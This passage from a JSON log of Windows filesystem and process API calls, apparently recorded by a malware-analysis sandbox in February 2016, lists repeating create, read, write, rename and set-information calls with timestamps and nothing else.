17:42:05,767", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,777", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,777", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,777", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,777", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,787", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,787", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,787", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,787", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,787", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,797", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,797", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,797", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,797", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,797", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,797", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,797", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,797", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,807", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,807", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,807", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,807", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,807", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,807", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,807", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,807", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,817", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,817", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,817", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,817", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,827", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,827", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,827", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,827", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,827", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,827", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,827", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,837", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,837", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,837", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,837", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,837", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,847", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,847", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,847", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,847", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,847", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,847", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,847", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,847", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,857", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,857", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,857", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,857", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,857", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,857", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,857", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,857", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,867", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,867", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,867", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,867", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,867", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,867", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,867", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,867", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,877", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,877", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,877", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,877", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,877", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,877", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,877", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,877", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,887", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,887", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,887", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,887", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,887", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,897", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,897", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,897", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,897", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,897", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,897", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,897", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,907", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,907", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,907", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,907", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,907", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,907", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,917", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,917", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,917", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,917", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,917", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,917", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,917", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,917", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,917", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,927", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,927", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,927", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,927", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,927", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,927", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,927", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,937", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,937", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,937", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,937", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,937", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,937", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,947", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,947", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,947", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,947", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,947", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,947", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,957", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,957", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,957", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,957", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,957", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,957", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,957", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,967", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,967", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,967", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,967", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,967", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,967", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,967", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,967", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,977", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,977", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,977", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,977", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,977", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,977", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,977", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,977", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,977", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,987", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,987", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,987", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,987", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,987", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,987", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,987", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,987", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,987", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,987", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,997", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,997", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,997", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,997", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,997", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,997", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,997", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,007", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,007", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,007", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,007", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,007", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,017", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,017", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,017", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,017", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,017", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,017", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,017", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,017", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,027", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,027", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,027", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,027", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,027", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,027", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,027", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,027", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,037", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,037", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,037", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,037", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,037", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,037", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,037", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,047", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,047", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,047", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,047", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,047", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,047", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,047", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,047", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,057", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,057", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,057", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,057", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,057", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,057", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,057", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,057", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,057", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,067", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,067", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,067", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,067", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,067", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,067", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,067", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,067", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,077", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,077", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,077", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,077", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,077", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,087", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,087", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,087", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,087", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,087", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,097", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,097", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,097", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,097", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,097", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,097", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,107", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,107", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,107", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,107", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,107", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,117", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,117", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,117", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,117", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,117", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,117", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,127", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,127", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,127", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,127", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,127", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,127", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,127", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,137", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,137", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,137", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,137", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,137", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,137", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,137", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,147", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,147", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,147", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,147", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,147", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,147", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,147", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,147", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,157", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,157", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,157", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,157", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,157", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,157", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,157", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,157", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,167", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,167", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,177", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,177", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,177", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,177", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,177", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,187", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,187", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,187", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,187", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,187", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,187", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,187", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,187", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,197", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,197", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,197", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,197", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,197", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,197", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,207", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,207", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,207", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,207", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,207", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,207", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,207", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,207", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,217", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,217", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,217", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,217", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,217", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,247", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,247", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,247", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,247", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,257", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,257", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,257", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,257", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,257", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,257", "api": 